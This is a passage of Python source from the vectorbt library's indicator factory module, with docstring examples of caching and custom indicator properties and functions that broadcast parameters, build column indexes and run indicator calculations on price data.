>>> %timeit MyInd.run(price, 2, np.arange(2, 1000))
264 ms ± 3.22 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
```
To avoid this, let's cache all unique rolling windows:
```python-repl
>>> @njit
... def cache_func_nb(price, ws1, ws2):
... cache_dict = dict()
... ws = ws1.copy()
... ws.extend(ws2)
... for i in range(len(ws)):
... h = hash((ws[i]))
... if h not in cache_dict:
... cache_dict[h] = roll_mean_expensive_nb(price, ws[i])
... return cache_dict
>>> @njit
... def apply_func_nb(price, w1, w2, cache_dict):
... return (cache_dict[hash(w2)] - cache_dict[hash(w1)]) / cache_dict[hash(w1)]
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['w1', 'w2'],
... output_names=['output'],
... ).from_apply_func(apply_func_nb, cache_func=cache_func_nb)
>>> MyInd.run(price, 2, 3).output
custom_w1 2
custom_w2 3
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 -0.200000 0.142857
2020-01-04 -0.142857 0.200000
2020-01-05 -0.111111 0.333333
>>> %timeit MyInd.run(price, 2, np.arange(2, 1000))
145 ms ± 4.55 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)
```
We have cut down the processing time almost in half.
Similar to raw outputs, we can force `IndicatorFactory` to return the cache, so it can be used
in other calculations or even indicators. The clear advantage of this approach is that we don't
rely on some fixed set of parameter combinations anymore, but on the values of each parameter,
which gives us more granularity in managing performance.
```python-repl
>>> cache = MyInd.run(price, 2, np.arange(2, 1000), return_cache=True)
>>> %timeit MyInd.run(price, np.arange(2, 1000), np.arange(2, 1000), use_cache=cache)
30.1 ms ± 2 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)
```
## Custom properties and methods
Use `custom_output_props` argument when constructing an indicator to define lazy outputs -
outputs that are processed only when explicitly called. They will become cached properties
and, in contrast to regular outputs, they can have an arbitrary shape. For example, let's
attach a property that will calculate the distance between the moving average and the price.
```python-repl
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window'],
... output_names=['ma'],
... custom_output_props=dict(distance=lambda self: (self.price - self.ma) / self.ma)
... ).from_apply_func(vbt.nb.rolling_mean_nb)
>>> MyInd.run(price, [2, 3]).distance
custom_window 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 0.333333 -0.111111 NaN NaN
2020-01-03 0.200000 -0.142857 0.500000 -0.250000
2020-01-04 0.142857 -0.200000 0.333333 -0.333333
2020-01-05 0.111111 -0.333333 0.250000 -0.500000
```
Another way of defining own properties and methods is subclassing:
```python-repl
>>> class MyIndExtended(MyInd):
... def plot(self, column=None, **kwargs):
... self_col = self.select_series(column=column, group_by=False)
... return self.ma.vbt.plot(**kwargs)
>>> MyIndExtended.run(price, [2, 3])[(2, 'a')].plot()
```

## Helper properties and methods
For all in `input_names`, `in_output_names`, `output_names`, and `custom_output_props`,
`IndicatorFactory` will create a bunch of comparison and combination methods, such as for generating signals.
What kind of methods are created can be regulated using `dtype` in the `attr_settings` dictionary.
```python-repl
>>> from collections import namedtuple
>>> MyEnum = namedtuple('MyEnum', ['one', 'two'])(0, 1)
>>> def apply_func_nb(price):
... out_float = np.empty(price.shape, dtype=np.float_)
... out_bool = np.empty(price.shape, dtype=np.bool_)
... out_enum = np.empty(price.shape, dtype=np.int_)
... return out_float, out_bool, out_enum
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... output_names=['out_float', 'out_bool', 'out_enum'],
... attr_settings=dict(
... out_float=dict(dtype=np.float_),
... out_bool=dict(dtype=np.bool_),
... out_enum=dict(dtype=MyEnum)
... )).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> dir(myind)
[
...
'out_bool',
'out_bool_and',
'out_bool_or',
'out_bool_xor',
'out_enum',
'out_enum_readable',
'out_float',
'out_float_above',
'out_float_below',
'out_float_equal',
...
'price',
'price_above',
'price_below',
'price_equal',
...
]
```
Each of these methods and properties are created for sheer convenience: to easily combine
boolean arrays using logical rules and to compare numeric arrays. All operations are done
strictly using NumPy. Another advantage is utilization of vectorbt's own broadcasting, such
that one can combine inputs and outputs with an arbitrary array-like object, given their
shapes can broadcast together.
We can also do comparison with multiple objects at once by passing them as a tuple/list:
```python-repl
>>> myind.price_above([1.5, 2.5])
custom_price_above 1.5 2.5
a b a b
2020-01-01 False True False True
2020-01-02 True True False True
2020-01-03 True True True True
2020-01-04 True True True False
2020-01-05 True False True False
```
## Indexing
`IndicatorFactory` attaches pandas indexing to the indicator class thanks to
`vectorbt.base.array_wrapper.ArrayWrapper`. Supported are `iloc`, `loc`,
`*param_name*_loc`, `xs`, and `__getitem__`.
This makes possible accessing rows and columns by labels, integer positions, and parameters.
```python-repl
>>> ma = vbt.MA.run(price, [2, 3])
>>> ma[(2, 'b')]
<vectorbt.indicators.basic.MA at 0x7fe4d10ddcc0>
>>> ma[(2, 'b')].ma
2020-01-01 NaN
2020-01-02 4.5
2020-01-03 3.5
2020-01-04 2.5
2020-01-05 1.5
Name: (2, b), dtype: float64
>>> ma.window_loc[2].ma
a b
2020-01-01 NaN NaN
2020-01-02 1.5 4.5
2020-01-03 2.5 3.5
2020-01-04 3.5 2.5
2020-01-05 4.5 1.5
```
## TA-Lib
Indicator factory also provides a class method `IndicatorFactory.from_talib`
that can be used to wrap any function from TA-Lib. It automatically fills all the
necessary information, such as input, parameter, and output names.
"""
import numpy as np
import pandas as pd
from numba import njit
from numba.typed import List
import itertools
import inspect
from collections import OrderedDict
import warnings
from vectorbt.utils import checks
from vectorbt.utils.decorators import classproperty, cached_property
from vectorbt.utils.config import merge_dicts
from vectorbt.utils.random import set_seed
from vectorbt.utils.params import (
to_typed_list,
broadcast_params,
create_param_product,
DefaultParam
)
from vectorbt.utils.enum import convert_str_enum_value
from vectorbt.base import index_fns, reshape_fns, combine_fns
from vectorbt.base.indexing import ParamIndexerFactory
from vectorbt.base.array_wrapper import ArrayWrapper, Wrapping
def params_to_list(params, is_tuple, is_array_like):
    """Cast parameters to a list.

    A single parameter value is wrapped into a one-element list. Container types
    (built-in and Numba typed lists, and — unless flagged otherwise — tuples and
    NumPy arrays) are treated as holding multiple parameter values.
    """
    # Types whose elements are treated as individual parameter values
    multi_value_types = [list, List]
    if not is_tuple:
        # A tuple counts as a container unless it should be seen as one value
        multi_value_types.append(tuple)
    if not is_array_like:
        # An array counts as a container unless it should be seen as one value
        multi_value_types.append(np.ndarray)
    if isinstance(params, tuple(multi_value_types)):
        return list(params)
    return [params]
def prepare_params(param_list, param_settings, input_shape=None, to_2d=False):
    """Prepare parameters.

    Casts each entry of `param_list` to a list of parameter values and, depending
    on its settings, converts enumerated string values and broadcasts values to
    the input shape (or one of its axes).
    """
    prepared = []
    for idx, params in enumerate(param_list):
        # Settings can be shared (dict) or given per parameter (list of dicts)
        settings = param_settings if isinstance(param_settings, dict) else param_settings[idx]
        is_tuple = settings.get('is_tuple', False)
        dtype = settings.get('dtype', None)
        if checks.is_namedtuple(dtype):
            # Map string representations of enumerated values to their integers
            params = convert_str_enum_value(dtype, params)
        is_array_like = settings.get('is_array_like', False)
        bc_to_input = settings.get('bc_to_input', False)
        broadcast_kwargs = settings.get('broadcast_kwargs', dict(require_kwargs=dict(requirements='W')))
        params = params_to_list(params, is_tuple, is_array_like)
        if bc_to_input is not False:
            # Broadcast each value to the input shape or one of its axes
            if is_tuple:
                raise ValueError("Tuples cannot be broadcast to input")
            if input_shape is None:
                raise ValueError("Cannot broadcast to input if input shape is unknown. Pass input_shape.")
            if bc_to_input is True:
                to_shape = input_shape
            else:
                checks.assert_in(bc_to_input, (0, 1))
                # input_shape can be 1-dim, hence the (1,) fallback for axis 1
                if bc_to_input == 0:
                    to_shape = input_shape[0]
                else:
                    to_shape = input_shape[1] if len(input_shape) > 1 else (1,)
            bc_params = reshape_fns.broadcast(
                *params,
                to_shape=to_shape,
                **broadcast_kwargs
            )
            if len(params) == 1:
                # broadcast returns a single object for a single argument
                bc_params = (bc_params,)
            if to_2d and bc_to_input is True:
                # Inputs get reshaped to 2 dims, so do the same to parameters,
                # but only to those that fully resemble inputs (= not raw)
                keep_raw = broadcast_kwargs.get('keep_raw', False)
                reshaped = []
                for j, param in enumerate(bc_params):
                    if keep_raw is False or (isinstance(keep_raw, (tuple, list)) and not keep_raw[j]):
                        reshaped.append(reshape_fns.to_2d(param))
                    else:
                        reshaped.append(param)
                params = reshaped
            else:
                params = bc_params
        prepared.append(params)
    return prepared
def build_columns(param_list, input_columns, level_names=None, hide_levels=None,
                  param_settings=None, per_column=False, ignore_default=False, **kwargs):
    """For each parameter in `param_list`, create a new column level with parameter values
    and stack it on top of `input_columns`.

    Returns a list of parameter indexes and new columns."""
    if level_names is not None:
        checks.assert_len_equal(param_list, level_names)
    if hide_levels is None:
        hide_levels = []
    if param_settings is None:
        param_settings = {}

    param_indexes = []
    shown_param_indexes = []
    for i, params in enumerate(param_list):
        level_name = level_names[i] if level_names is not None else None
        if per_column:
            # One parameter value per input column -> index maps one-to-one
            param_index = index_fns.index_from_values(params, name=level_name)
        else:
            # Settings can be shared (dict) or given per parameter (list of dicts)
            settings = param_settings if isinstance(param_settings, dict) else param_settings[i]
            if settings.get('per_column', False):
                # Expand each (possibly array-like) value across the input columns
                param_index = None
                for param in params:
                    bc_param = np.broadcast_to(param, len(input_columns))
                    value_index = index_fns.index_from_values(bc_param, name=level_name)
                    if param_index is None:
                        param_index = value_index
                    else:
                        param_index = param_index.append(value_index)
                if len(param_index) == 1 and len(input_columns) > 1:
                    # When using flexible column-wise parameters
                    param_index = index_fns.repeat_index(
                        param_index,
                        len(input_columns),
                        ignore_default=ignore_default
                    )
            else:
                # Repeat each value so it covers every input column
                param_index = index_fns.index_from_values(params, name=level_name)
                param_index = index_fns.repeat_index(
                    param_index,
                    len(input_columns),
                    ignore_default=ignore_default
                )
        param_indexes.append(param_index)
        if i not in hide_levels:
            shown_param_indexes.append(param_index)

    if len(shown_param_indexes) > 0:
        if not per_column:
            # Tile input columns once per parameter combination
            n_param_values = len(param_list[0]) if len(param_list) > 0 else 1
            input_columns = index_fns.tile_index(
                input_columns,
                n_param_values,
                ignore_default=ignore_default
            )
        stacked_columns = index_fns.stack_indexes([*shown_param_indexes, input_columns], **kwargs)
        return param_indexes, stacked_columns
    return param_indexes, input_columns
def run_pipeline(
num_ret_outputs,
custom_func,
*args,
require_input_shape=False,
input_shape=None,
input_index=None,
input_columns=None,
input_list=None,
in_output_list=None,
in_output_settings=None,
broadcast_kwargs=None,
param_list=None,
param_product=False,
param_settings=None,
speedup=False,
silence_warnings=False,
per_column=False,
pass_col=False,
keep_pd=False,
to_2d=True,
as_lists=False,
pass_input_shape=False,
pass_flex_2d=False,
level_names=None,
hide_levels=None,
stacking_kwargs=None,
return_raw=False,
use_raw=None,
wrapper_kwargs=None,
seed=None,
**kwargs):
"""A pipeline for running an indicator, used by `IndicatorFactory`.
Args:
num_ret_outputs (int): The number of output arrays returned by `custom_func`.
custom_func (callable): A custom calculation function.
See `IndicatorFactory.from_custom_func`.
*args: Arguments passed to the `custom_func`.
        require_input_shape (bool): Whether the input shape is required.
            Will set `pass_input_shape` to True and raise an error if `input_shape` is None.
input_shape (tuple): Shape to broadcast each input to.
Can be passed to `custom_func`. See `pass_input_shape`.
input_index (any): Sets index of each input.
Can be used to label index if no inputs passed.
input_columns (any): Sets columns of each input.
Can be used to label columns if no inputs passed.
input_list (list of array_like): A list of input arrays.
in_output_list (list of array_like): A list of in-place output arrays.
If an array should be generated, pass None.
in_output_settings (dict or list of dict): Settings corresponding to each in-place output.
Following keys are accepted:
* `dtype`: Create this array using this data type and `np.empty`. Default is None.
broadcast_kwargs (dict): Keyword arguments passed to `vectorbt.base.reshape_fns.broadcast`
to broadcast inputs.
param_list (list of array_like): A list of parameters.
Each element is either an array-like object or a single value of any type.
param_product (bool): Whether to build a Cartesian product out of all parameters.
param_settings (dict or list of dict): Settings corresponding to each parameter.
Following keys are accepted:
* `dtype`: If data type is enumerated type and a string as parameter value was passed,
will convert it to integer first.
* `is_tuple`: If tuple was passed, it will be considered as a single value.
To treat it as multiple values, pack it into a list.
* `is_array_like`: If array-like object was passed, it will be considered as a single value.
To treat it as multiple values, pack it into a list.
* `bc_to_input`: Whether to broadcast parameter to input size. You can also broadcast
parameter to an axis by passing an integer.
* `broadcast_kwargs`: Keyword arguments passed to `vectorbt.base.reshape_fns.broadcast`.
* `per_column`: Whether each parameter value can be split per column such that it can
be better reflected in a multi-index. Does not affect broadcasting.
speedup (bool): Whether to run only on unique parameter combinations.
Disable if two identical parameter combinations can lead to different results
(e.g., due to randomness) or if inputs are large and `custom_func` is fast.
!!! note
Cache, raw output, and output objects outside of `num_ret_outputs` will be returned
for unique parameter combinations only.
silence_warnings (bool): Whether to hide warnings such as coming from `speedup`.
per_column (bool): Whether to split the DataFrame into Series, one per column, and run `custom_func`
on each Series.
Each list of parameter values will be broadcast to the number of columns and
each parameter value will be applied per Series rather than per DataFrame.
Input shape must be known beforehand.
pass_col (bool): Whether to pass column index as keyword argument if `per_column` is set to True.
keep_pd (bool): Whether to keep inputs as pandas objects, otherwise convert to NumPy arrays.
to_2d (bool): Whether to reshape inputs to 2-dim arrays, otherwise keep as-is.
as_lists (bool): Whether to pass inputs and parameters to `custom_func` as lists.
If `custom_func` is Numba-compiled, passes tuples.
pass_input_shape (bool): Whether to pass `input_shape` to `custom_func` as keyword argument.
pass_flex_2d (bool): Whether to pass `flex_2d` to `custom_func` as keyword argument.
level_names (list of str): A list of column level names corresponding to each parameter.
Should have the same length as `param_list`.
hide_levels (list): A list of indices of parameter levels to hide.
stacking_kwargs (dict): Keyword arguments passed to `vectorbt.base.index_fns.repeat_index`,
`vectorbt.base.index_fns.tile_index`, and `vectorbt.base.index_fns.stack_indexes`
when stacking parameter and input column levels.
return_raw (bool): Whether to return raw output without post-processing and hashed parameter tuples.
        use_raw (tuple): Takes the raw results of a previous run and uses them instead of running `custom_func`.
wrapper_kwargs (dict): Keyword arguments passed to `vectorbt.base.array_wrapper.ArrayWrapper`.
seed (int): Set seed to make output deterministic.
**kwargs: Keyword arguments passed to the `custom_func`.
Some common arguments include `return_cache` to return cache and `use_cache` to use cache.
Those are only applicable to `custom_func` that supports it (`custom_func` created using
`IndicatorFactory.from_apply_func` are supported by default).
Returns:
Array wrapper, list of inputs (`np.ndarray`), input mapper (`np.ndarray`), list of outputs
(`np.ndarray`), list of parameter arrays (`np.ndarray`), list of parameter mappers (`np.ndarray`),
list of outputs that are outside of `num_ret_outputs`.
## Explanation
Here is a subset of tasks that the function `run_pipeline` does:
* Takes one or multiple array objects in `input_list` and broadcasts them.
```python-repl
>>> sr = pd.Series([1, 2], index=['x', 'y'])
>>> df = pd.DataFrame([[3, 4], [5, 6]], index=['x', 'y'], columns=['a', 'b'])
>>> input_list = vbt.base.reshape_fns.broadcast(sr, df)
>>> input_list[0]
a b
x 1 1
y 2 2
>>> input_list[1]
a b
x 3 4
y 5 6
```
* Takes one or multiple parameters in `param_list`, converts them to NumPy arrays and
broadcasts them.
```python-repl
>>> p1, p2, p3 = 1, [2, 3, 4], [False]
>>> param_list = vbt.base.reshape_fns.broadcast(p1, p2, p3)
>>> param_list[0]
array([1, 1, 1])
>>> param_list[1]
array([2, 3, 4])
>>> param_list[2]
array([False, False, False])
```
* Performs calculation using `custom_func` to build output arrays (`output_list`) and
other objects (`other_list`, optionally).
```python-repl
>>> def custom_func(ts1, ts2, p1, p2, p3, *args, **kwargs):
... return np.hstack((
... ts1 + ts2 + p1[0] * p2[0],
... ts1 + ts2 + p1[1] * p2[1],
... ts1 + ts2 + p1[2] * p2[2],
... ))
>>> output = custom_func(*input_list, *param_list)
>>> output
array([[ 6, 7, 7, 8, 8, 9],
[ 9, 10, 10, 11, 11, 12]])
```
* Creates new column hierarchy based on parameters and level names.
```python-repl
>>> p1_columns = pd.Index(param_list[0], name='p1')
>>> p2_columns = pd.Index(param_list[1], name='p2')
>>> p3_columns = pd.Index(param_list[2], name='p3')
>>> p_columns = vbt.base.index_fns.stack_indexes([p1_columns, p2_columns, p3_columns])
>>> new_columns = vbt.base.index_fns.combine_indexes([p_columns, input_list[0].columns])
>>> output_df = pd.DataFrame(output, columns=new_columns)
>>> output_df
p1 1
p2 2 3 4
p3 False False False False False False
a b a b a b
0 6 7 7 8 8 9
1 9 10 10 11 11 12
```
* Broadcasts objects in `input_list` to match the shape of objects in `output_list` through tiling.
This is done to be able to compare them and generate signals, since we cannot compare NumPy
arrays that have totally different shapes, such as (2, 2) and (2, 6).
```python-repl
>>> new_input_list = [
... input_list[0].vbt.tile(len(param_list[0]), keys=p_columns),
... input_list[1].vbt.tile(len(param_list[0]), keys=p_columns)
... ]
>>> new_input_list[0]
p1 1
p2 2 3 4
p3 False False False False False False
a b a b a b
0 1 1 1 1 1 1
1 2 2 2 2 2 2
```
* Builds parameter mappers that will link parameters from `param_list` to columns in
`input_list` and `output_list`. This is done to enable column indexing using parameter values.
"""
if require_input_shape:
checks.assert_not_none(input_shape)
pass_input_shape = True
if input_list is None:
input_list = []
if in_output_list is None:
in_output_list = []
if in_output_settings is None:
in_output_settings = {}
in_output_settings_keys = ['dtype']
if isinstance(in_output_settings, dict):
checks.assert_dict_valid(in_output_settings, [in_output_settings_keys])
else:
for _in_output_settings in in_output_settings:
checks.assert_dict_valid(_in_output_settings, [in_output_settings_keys])
if broadcast_kwargs is None:
broadcast_kwargs = {}
if param_list is None:
param_list = []
if param_settings is None:
param_settings = {}
param_settings_keys = [
'dtype',
'is_tuple',
'is_array_like',
'bc_to_input',
'broadcast_kwargs',
'per_column'
]
if isinstance(param_settings, dict):
checks.assert_dict_valid(param_settings, [param_settings_keys])
else:
for _param_settings in param_settings:
checks.assert_dict_valid(_param_settings, [param_settings_keys])
if hide_levels is None:
hide_levels = []
if stacking_kwargs is None:
stacking_kwargs = {}
if wrapper_kwargs is None:
wrapper_kwargs = {}
if keep_pd and checks.is_numba_func(custom_func):
raise ValueError("Cannot pass pandas objects to a Numba-compiled custom_func. Set keep_pd to False.")
in_output_idxs = [i for i, x in enumerate(in_output_list) if x is not None]
if len(in_output_idxs) > 0:
# In-place outputs should broadcast together with inputs
input_list += [in_output_list[i] for i in in_output_idxs]
if len(input_list) > 0:
# Broadcast inputs
if input_index is None:
input_index = 'default'
if input_columns is None:
input_columns = 'default'
# If input_shape is provided, will broadcast all inputs to this shape
broadcast_kwargs = merge_dicts(dict(
to_shape=input_shape,
index_from=input_index,
columns_from=input_columns
), broadcast_kwargs)
bc_input_list, input_shape, input_index, input_columns = reshape_fns.broadcast(
*input_list,
return_meta=True,
**broadcast_kwargs
)
if len(input_list) == 1:
bc_input_list = (bc_input_list,)
input_list = list(map(np.asarray, bc_input_list))
bc_in_output_list = []
if len(in_output_idxs) > 0:
# Separate inputs and in-place outputs
bc_in_output_list = input_list[-len(in_output_idxs):]
input_list = input_list[:-len(in_output_idxs)]
# Reshape input shape
if input_shape is not None and not isinstance(input_shape, tuple):
input_shape = (input_shape,)
# Keep original input_shape for per_column=True
orig_input_shape = input_shape
orig_input_shape_2d = input_shape
if input_shape is not None:
orig_input_shape_2d = input_shape if len(input_shape) > 1 else (input_shape[0], 1)
if per_column:
# input_shape is now the size of one column
if input_shape is None:
raise ValueError("input_shape is required when per_column=True")
input_shape = (input_shape[0],)
input_shape_ready = input_shape
input_shape_2d = input_shape
if input_shape is not None:
input_shape_2d = input_shape if len(input_shape) > 1 else (input_shape[0], 1)
if to_2d:
if input_shape is not None:
input_shape_ready = input_shape_2d # ready for custom_func
# Prepare parameters
# NOTE: input_shape instead of input_shape_ready since parameters should
# broadcast by the same rules as inputs
param_list = prepare_params(param_list, param_settings, input_shape=input_shape, to_2d=to_2d)
if len(param_list) > 1:
# Check level names
checks.assert_type(level_names, (list, tuple))
checks.assert_len_equal(param_list, level_names)
# Columns should be free of the specified level names
if input_columns is not None:
for level_name in level_names:
if level_name is not None:
checks.assert_level_not_exists(input_columns, level_name)
if param_product:
# Make Cartesian product out of all params
param_list = create_param_product(param_list)
if len(param_list) > 0:
# Broadcast such that each array has the same length
if per_column:
# The number of parameters should match the number of columns before split
param_list = broadcast_params(param_list, to_n=orig_input_shape_2d[1])
else:
param_list = broadcast_params(param_list)
n_param_values = len(param_list[0]) if len(param_list) > 0 else 1
use_speedup = False
param_list_unique = param_list
if not per_column and speedup:
try:
# Try to get all unique parameter combinations
param_tuples = list(zip(*param_list))
unique_param_tuples = list(OrderedDict.fromkeys(param_tuples).keys())
if len(unique_param_tuples) < len(param_tuples):
param_list_unique = list(map(list, zip(*unique_param_tuples)))
use_speedup = True
except:
pass
if checks.is_numba_func(custom_func):
# Numba can't stand untyped lists
param_list_ready = [to_typed_list(params) for params in param_list_unique]
else:
param_list_ready = param_list_unique
n_unique_param_values = len(param_list_unique[0]) if len(param_list_unique) > 0 else 1
# Prepare inputs
if per_column:
# Split each input into Series/1-dim arrays, one per column
input_list_ready = []
for input in input_list:
input_2d = reshape_fns.to_2d(input)
col_inputs = []
for i in range(input_2d.shape[1]):
if to_2d:
col_input = input_2d[:, [i]]
else:
col_input = input_2d[:, i]
if keep_pd:
# Keep as pandas object
col_input = ArrayWrapper(input_index, input_columns[[i]], col_input.ndim).wrap(col_input)
col_inputs.append(col_input)
input_list_ready.append(col_inputs)
else:
input_list_ready = []
for input in input_list:
new_input = input
if to_2d:
new_input = reshape_fns.to_2d(input)
if keep_pd:
# Keep as pandas object
new_input = ArrayWrapper(input_index, input_columns, new_input.ndim).wrap(new_input)
input_list_ready.append(new_input)
# Prepare in-place outputs
in_output_list_ready = []
j = 0
for i in range(len(in_output_list)):
if input_shape_2d is None:
raise ValueError("input_shape is required when using in-place outputs")
if i in in_output_idxs:
# This in-place output has been already broadcast with inputs
in_output_wide = np.require(bc_in_output_list[j], requirements='W')
if not per_column:
# One per parameter combination
in_output_wide = reshape_fns.tile(in_output_wide, n_unique_param_values, axis=1)
j += 1
else:
# This in-place output hasn't been provided, so create empty
_in_output_settings = in_output_settings if isinstance(in_output_settings, dict) else in_output_settings[i]
dtype = _in_output_settings.get('dtype', None)
in_output_shape = (input_shape_2d[0], input_shape_2d[1] * n_unique_param_values)
in_output_wide = np.empty(in_output_shape, dtype=dtype)
in_output_list[i] = in_output_wide
in_outputs = []
# Split each in-place output into chunks, each of input shape, and append to a list
for i in range(n_unique_param_values):
in_output = in_output_wide[:, i * input_shape_2d[1]: (i + 1) * input_shape_2d[1]]
if len(input_shape_ready) == 1:
in_output = in_output[:, 0]
if keep_pd:
if per_column:
in_output = ArrayWrapper(input_index, input_columns[[i]], in_output.ndim).wrap(in_output)
else:
in_output = ArrayWrapper(input_index, input_columns, in_output.ndim).wrap(in_output)
in_outputs.append(in_output)
in_output_list_ready.append(in_outputs)
if checks.is_numba_func(custom_func):
# Numba can't stand untyped lists
in_output_list_ready = [to_typed_list(in_outputs) for in_outputs in in_output_list_ready]
def _use_raw(_raw):
# Use raw results of previous run to build outputs
_output_list, _param_map, _n_input_cols, _other_list = _raw
idxs = np.array([_param_map.index(param_tuple) for param_tuple in zip(*param_list)])
_output_list = [
np.hstack([o[:, idx * _n_input_cols:(idx + 1) * _n_input_cols] for idx in idxs])
for o in _output_list
]
return _output_list, _param_map, _n_input_cols, _other_list
# Get raw results
if use_raw is not None:
# Use raw results of previous run to build outputs
output_list, param_map, n_input_cols, other_list = _use_raw(use_raw)
else:
# Prepare other arguments
func_args = args
func_kwargs = {}
if pass_input_shape:
func_kwargs['input_shape'] = input_shape_ready
if pass_flex_2d:
if input_shape is None:
raise ValueError("Cannot determine flex_2d without inputs")
func_kwargs['flex_2d'] = len(input_shape) == 2
func_kwargs = merge_dicts(func_kwargs, kwargs)
# Set seed
if seed is not None:
set_seed(seed)
def _call_custom_func(_input_list_ready, _in_output_list_ready, _param_list_ready, *_func_args, **_func_kwargs):
# Run the function
if as_lists:
if checks.is_numba_func(custom_func):
return custom_func(
tuple(_input_list_ready),
tuple(_in_output_list_ready),
tuple(_param_list_ready),
*_func_args, **_func_kwargs
)
return custom_func(
_input_list_ready,
_in_output_list_ready,
_param_list_ready,
*_func_args, **_func_kwargs
)
return custom_func(
*_input_list_ready,
*_in_output_list_ready,
*_param_list_ready,
*_func_args, **_func_kwargs
)
if per_column:
output = []
for col in range(orig_input_shape_2d[1]):
# Select the column of each input and in-place output, and the respective parameter combination
_input_list_ready = []
for _inputs in input_list_ready:
# Each input array is now one column wide
_input_list_ready.append(_inputs[col])
_in_output_list_ready = []
for _in_outputs in in_output_list_ready:
# Each in-output array is now one column wide
if isinstance(_in_outputs, List):
__in_outputs = List()
else:
__in_outputs = []
__in_outputs.append(_in_outputs[col])
_in_output_list_ready.append(__in_outputs)
_param_list_ready = []
for _params in param_list_ready:
# Each parameter list is now one element long
if isinstance(_params, List):
__params = List()
else:
__params = []
__params.append(_params[col])
_param_list_ready.append(__params)
_func_args = func_args
_func_kwargs = func_kwargs.copy()
if 'use_cache' in func_kwargs:
use_cache = func_kwargs['use_cache']
if isinstance(use_cache, list) and len(use_cache) == orig_input_shape_2d[1]:
# Pass cache for this column
_func_kwargs['use_cache'] = func_kwargs['use_cache'][col]
if pass_col:
_func_kwargs['col'] = col
col_output = _call_custom_func(
_input_list_ready,
_in_output_list_ready,
_param_list_ready,
*_func_args,
**_func_kwargs
)
output.append(col_output)
else:
output = _call_custom_func(
input_list_ready,
in_output_list_ready,
param_list_ready,
*func_args,
**func_kwargs
)
# Return cache
if kwargs.get('return_cache', False):
if use_speedup and not silence_warnings:
warnings.warn("Cache is produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
return output
def _split_output(output):
# Post-process results
if output is None:
_output_list = []
_other_list = []
else:
if isinstance(output, (tuple, list, List)):
_output_list = list(output)
else:
_output_list = [output]
# Other outputs should be returned without post-processing (for example cache_dict)
if len(_output_list) > num_ret_outputs:
_other_list = _output_list[num_ret_outputs:]
if use_speedup and not silence_warnings:
warnings.warn("Additional output objects are produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
else:
_other_list = []
# Process only the num_ret_outputs outputs
_output_list = _output_list[:num_ret_outputs]
if len(_output_list) != num_ret_outputs:
raise ValueError("Number of returned outputs other than expected")
_output_list = list(map(lambda x: reshape_fns.to_2d(x, raw=True), _output_list))
return _output_list, _other_list
if per_column:
output_list = []
other_list = []
for _output in output:
__output_list, __other_list = _split_output(_output)
output_list.append(__output_list)
if len(__other_list) > 0:
other_list.append(__other_list)
# Concatenate each output (must be one column wide)
output_list = [np.hstack(input_group) for input_group in zip(*output_list)]
else:
output_list, other_list = _split_output(output)
# In-place outputs are treated as outputs from here
output_list = in_output_list + output_list
# Prepare raw
param_map = list(zip(*param_list_unique)) # account for use_speedup
output_shape = output_list[0].shape
for output in output_list:
if output.shape != output_shape:
raise ValueError("All outputs must have the same shape")
if per_column:
n_input_cols = 1
else:
n_input_cols = output_shape[1] // n_unique_param_values
if input_shape_2d is not None:
if n_input_cols != input_shape_2d[1]:
if per_column:
raise ValueError("All outputs must have one column when per_column=True")
else:
raise ValueError("All outputs must have the number of columns = #input columns x #parameters")
raw = output_list, param_map, n_input_cols, other_list
if return_raw:
if use_speedup and not silence_warnings:
warnings.warn("Raw output is produced by unique parameter "
"combinations when speedup=True", stacklevel=2)
return raw
if use_speedup:
output_list, param_map, n_input_cols, other_list = _use_raw(raw)
# Update shape and other meta if no inputs
if input_shape is None:
if n_input_cols == 1:
input_shape = (output_list[0].shape[0],)
else:
input_shape = (output_list[0].shape[0], n_input_cols)
else:
input_shape = orig_input_shape
if input_index is None:
input_index = pd.RangeIndex(start=0, step=1, stop=input_shape[0])
if input_columns is None:
input_columns = pd.RangeIndex(start=0, step=1, stop=input_shape[1] if len(input_shape) > 1 else 1)
# Build column hierarchy and create mappers
if len(param_list) > 0:
# Build new column levels on top of input levels
param_indexes, new_columns = build_columns(
param_list,
input_columns,
level_names=level_names,
hide_levels=hide_levels,
param_settings=param_settings,
per_column=per_column,
**stacking_kwargs
)
# Build a mapper that maps old columns in inputs to new columns
# Instead of tiling all inputs to the shape of outputs and wasting memory,
# we just keep a mapper and perform the tiling when needed
input_mapper = None
if len(input_list) > 0:
if per_column:
input_mapper = np.arange(len(input_columns))
else:
input_mapper = np.tile(np.arange(len(input_columns)), n_param_values)
# Build mappers to easily map between parameters and columns
mapper_list = [param_indexes[i] for i in range(len(param_list))]
else:
# Some indicators don't have any params
new_columns = input_columns
input_mapper = None
mapper_list = []
# Return artifacts: no pandas objects, just a wrapper and NumPy arrays
new_ndim = len(input_shape) if output_list[0].shape[1] == 1 else output_list[0].ndim
wrapper = ArrayWrapper(input_index, new_columns, new_ndim, **wrapper_kwargs)
return wrapper, \
input_list, \
input_mapper, \
output_list[:len(in_output_list)], \
output_list[len(in_output_list):], \
param_list, \
mapper_list, \
other_list
def perform_init_checks(wrapper, input_list, input_mapper, in_output_list, output_list,
                        param_list, mapper_list, short_name, level_names):
    """Validate the artifacts produced by running or slicing an indicator.

    Ensures every input, (in-place) output, parameter list and column mapper
    agrees with the wrapper's 2-dim shape before an indicator instance is built.
    """
    n_rows, n_cols = wrapper.shape_2d
    # Input mapper must map every wrapper column back to an input column
    if input_mapper is not None:
        checks.assert_equal(input_mapper.shape[0], n_cols)
    # Inputs only need to match along the row axis (columns are mapped)
    for arr in input_list:
        checks.assert_equal(arr.shape[0], n_rows)
    # Outputs (in-place and regular) must match the full 2-dim shape
    for arr in in_output_list + output_list:
        checks.assert_equal(arr.shape, wrapper.shape_2d)
    # All parameter lists must be broadcast to the same length
    for param_values in param_list:
        checks.assert_len_equal(param_list[0], param_values)
    # One mapper entry per wrapper column
    for col_mapper in mapper_list:
